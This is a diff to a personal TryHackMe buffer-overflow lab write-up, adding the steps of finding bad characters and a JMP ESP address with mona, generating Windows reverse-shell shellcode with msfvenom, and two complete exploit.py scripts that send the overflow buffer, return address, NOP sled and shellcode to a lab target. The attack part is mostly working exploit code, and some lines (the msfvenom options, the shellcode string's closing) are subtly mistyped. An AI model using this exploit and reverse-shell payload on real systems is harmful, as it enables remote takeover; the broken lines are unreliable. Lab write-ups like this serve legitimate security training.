--- a/TryHackMe/Buffer_Overflow_Prep/1.md
+++ b/TryHackMe/Buffer_Overflow_Prep/1.md
@@ -271,8 +271,157 @@ I note the new ESP address of 019AFA30, and rerun the mona command with this new
 
 ![image](https://user-images.githubusercontent.com/83407557/185206283-330c39d3-a0f9-4047-aa4e-ffb70ac0a980.png)
 
-It still shows 4 possible, with the first in the array usually corrupting the second, so I remove 2e and a0 from my python script, and from mona's array.bin file.
+It still shows 4 possible, with the first in the array usually corrupting the second, so I remove 2e and a0 from my python script, and from mona's array.bin file. I run it again, crash the app and note ESP is set to 01A4FA30
+
+!mona compare -f C:\mona\oscp\bytearray.bin -a 01A4FA30
+
+This time there are no errors, telling me my badchars are 00 07 2e and a0
+
+![image](https://user-images.githubusercontent.com/83407557/185209026-26ad3a10-019c-4f07-b20d-53b65cf58c39.png)
 
 
+# Finding a jump point
 
+To find a esp jump poit with mona, omitting the badchars I found:
+
+`!mona jmp -r esp -cpb "\x00\x07\x2e\xa0"`
+
+Mona finds 9 possible jump points
+
+![image](https://user-images.githubusercontent.com/83407557/185210110-82965fe6-3931-455b-93e5-2b13c027c0df.png)
+
+
+Reversing these adresses to fit little endian format:
+
+```
+\xaf\x11\x50\x62
+\xbb\x11\x50\x62
+\xc7\x11\x50\x62
+\xd3\x11\x50\x62
+\xdf\x11\x50\x62
+\xeb\x11\x50\x62
+\xf7\x11\x50\x62
+\x03\x12\x50\x62
+\x05\x12\x50\x62
+```
+Next, I need the shellcode payload, which I will generate with msfvenom and omit the found bad chars
+I take note of my ipv4 address on the tun0 network to get lhost
+
+
+`msfvenom -p windows/shell_reverse_tcp LHOST=10.6.77.38L PORT=53 EXITFUNC=thread -b "\x00\x07\x2e\a0" -f c`
+
+With these bits of information I am ready to create exploit.py, trying the first return address:
+
+Exploit.py
+```python
+#!/usr/bin/env python3
+import socket
+
+ip = "10.10.45.178"
+port = 1337
+
+prefix = "OVERFLOW1 "
+offset = 1978
+overflow = "A" * offset
+retn = "\xaf\x11\x50\x62"
+padding = ""
+payload =("\xbb\x39\xe8\x32\x18\xdb\xc4\xd9\x74\x24\xf4\x5a\x2b\xc9\xb1"
+"\x52\x31\x5a\x12\x83\xea\xfc\x03\x63\xe6\xd0\xed\x6f\x1e\x96"
+"\x0e\x8f\xdf\xf7\x87\x6a\xee\x37\xf3\xff\x41\x88\x77\xad\x6d"
+"\x63\xd5\x45\xe5\x01\xf2\x6a\x4e\xaf\x24\x45\x4f\x9c\x15\xc4"
+"\xd3\xdf\x49\x26\xed\x2f\x9c\x27\x2a\x4d\x6d\x75\xe3\x19\xc0"
+"\x69\x80\x54\xd9\x02\xda\x79\x59\xf7\xab\x78\x48\xa6\xa0\x22"
+"\x4a\x49\x64\x5f\xc3\x51\x69\x5a\x9d\xea\x59\x10\x1c\x3a\x90"
+"\xd9\xb3\x03\x1c\x28\xcd\x44\x9b\xd3\xb8\xbc\xdf\x6e\xbb\x7b"
+"\x9d\xb4\x4e\x9f\x05\x3e\xe8\x7b\xb7\x93\x6f\x08\xbb\x58\xfb"
+"\x56\xd8\x5f\x28\xed\xe4\xd4\xcf\x21\x6d\xae\xeb\xe5\x35\x74"
+"\x95\xbc\x93\xdb\xaa\xde\x7b\x83\x0e\x95\x96\xd0\x22\xf4\xfe"
+"\x15\x0f\x06\xff\x31\x18\x75\xcd\x9e\xb2\x11\x7d\x56\x1d\xe6"
+"\x82\x4d\xd9\x78\x7d\x6e\x1a\x51\xba\x3a\x4a\xc9\x6b\x43\x01"
+"\x09\x93\x96\x86\x59\x3b\x49\x67\x09\xfb\x39\x0f\x43\xf4\x66"
+"\x2f\x6c\xde\x0e\xda\x97\x89\x3a\x1d\xda\x6f\x53\x23\xe4\x6f"
+"\x96\xaa\x02\x05\xc8\xfa\x9d\xb2\x71\xa7\x55\x22\x7d\x7d\x10"
+"\x64\xf5\x72\xe5\x2b\xfe\xff\xf5\xdc\x0e\x4a\xa7\x4b\x10\x60"
+"\xcf\x10\x83\xef\x0f\x5e\xb8\xa7\x58\x37\x0e\xbe\x0c\xa5\x29"
+"\x68\x32\x34\xaf\x53\xf6\xe3\x0c\x5d\xf7\x66\x28\x79\xe7\xbe"
+"\xb1\xc5\x53\x6f\xe4\x93\x0d\xc9\x5e\x52\xe7\x83\x0d\x3c\x6f"
+"\x55\x7e\xff\xe9\x5a\xab\x89\x15\xea\x02\xcc\x2a\xc3\xc2\xd8"
+"\x53\x39\x73\x26\x8e\xf9\x93\xc5\x1a\xf4\x3b\x50\xcf\xb5\x21"
+"\x63\x3a\xf9\x5f\xe0\xce\x82\x9b\xf8\xbb\x87\xe0\xbe\x50\xfa"
+"\x79\x2b\x56\xa9\x7a\x7e";)
+
+postfix = ""
+
+buffer = prefix + overflow + retn + padding + payload + postfix
+
+s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
+
+try:
+    s.connect((ip, port))
+    print("Sending evil buffer...")
+    s.send(bytes(buffer + "\r\n", "latin-1"))
+    print("Done!")
+except:
+    print("Could not connect.")
+```
+
+# prepend NOP sled
+
+Before I am ready to fire off the exploit, I want to add a NOP sled in order to make room for any encoder stubs that may get mangled if I dont leave room for them. 16 to star
+
+```python
+#!/usr/bin/env python3
+import socket
+
+ip = "10.10.45.178"
+port = 1337
+
+prefix = "OVERFLOW1 "
+offset = 1978
+overflow = "A" * offset
+retn = "\xaf\x11\x50\x62"
+padding = "\x90" * 16
+payload =("\xbb\x39\xe8\x32\x18\xdb\xc4\xd9\x74\x24\xf4\x5a\x2b\xc9\xb1"
+"\x52\x31\x5a\x12\x83\xea\xfc\x03\x63\xe6\xd0\xed\x6f\x1e\x96"
+"\x0e\x8f\xdf\xf7\x87\x6a\xee\x37\xf3\xff\x41\x88\x77\xad\x6d"
+"\x63\xd5\x45\xe5\x01\xf2\x6a\x4e\xaf\x24\x45\x4f\x9c\x15\xc4"
+"\xd3\xdf\x49\x26\xed\x2f\x9c\x27\x2a\x4d\x6d\x75\xe3\x19\xc0"
+"\x69\x80\x54\xd9\x02\xda\x79\x59\xf7\xab\x78\x48\xa6\xa0\x22"
+"\x4a\x49\x64\x5f\xc3\x51\x69\x5a\x9d\xea\x59\x10\x1c\x3a\x90"
+"\xd9\xb3\x03\x1c\x28\xcd\x44\x9b\xd3\xb8\xbc\xdf\x6e\xbb\x7b"
+"\x9d\xb4\x4e\x9f\x05\x3e\xe8\x7b\xb7\x93\x6f\x08\xbb\x58\xfb"
+"\x56\xd8\x5f\x28\xed\xe4\xd4\xcf\x21\x6d\xae\xeb\xe5\x35\x74"
+"\x95\xbc\x93\xdb\xaa\xde\x7b\x83\x0e\x95\x96\xd0\x22\xf4\xfe"
+"\x15\x0f\x06\xff\x31\x18\x75\xcd\x9e\xb2\x11\x7d\x56\x1d\xe6"
+"\x82\x4d\xd9\x78\x7d\x6e\x1a\x51\xba\x3a\x4a\xc9\x6b\x43\x01"
+"\x09\x93\x96\x86\x59\x3b\x49\x67\x09\xfb\x39\x0f\x43\xf4\x66"
+"\x2f\x6c\xde\x0e\xda\x97\x89\x3a\x1d\xda\x6f\x53\x23\xe4\x6f"
+"\x96\xaa\x02\x05\xc8\xfa\x9d\xb2\x71\xa7\x55\x22\x7d\x7d\x10"
+"\x64\xf5\x72\xe5\x2b\xfe\xff\xf5\xdc\x0e\x4a\xa7\x4b\x10\x60"
+"\xcf\x10\x83\xef\x0f\x5e\xb8\xa7\x58\x37\x0e\xbe\x0c\xa5\x29"
+"\x68\x32\x34\xaf\x53\xf6\xe3\x0c\x5d\xf7\x66\x28\x79\xe7\xbe"
+"\xb1\xc5\x53\x6f\xe4\x93\x0d\xc9\x5e\x52\xe7\x83\x0d\x3c\x6f"
+"\x55\x7e\xff\xe9\x5a\xab\x89\x15\xea\x02\xcc\x2a\xc3\xc2\xd8"
+"\x53\x39\x73\x26\x8e\xf9\x93\xc5\x1a\xf4\x3b\x50\xcf\xb5\x21"
+"\x63\x3a\xf9\x5f\xe0\xce\x82\x9b\xf8\xbb\x87\xe0\xbe\x50\xfa"
+"\x79\x2b\x56\xa9\x7a\x7e";)
+
+postfix = ""
+
+buffer = prefix + overflow + retn + padding + payload + postfix
+
+s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
+
+try:
+    s.connect((ip, port))
+    print("Sending evil buffer...")
+    s.send(bytes(buffer + "\r\n", "latin-1"))
+    print("Done!")
+except:
+    print("Could not connect.")
+```
+
+# Final exploit
+
+I reset the program. Start a listener and run exploit.py
 
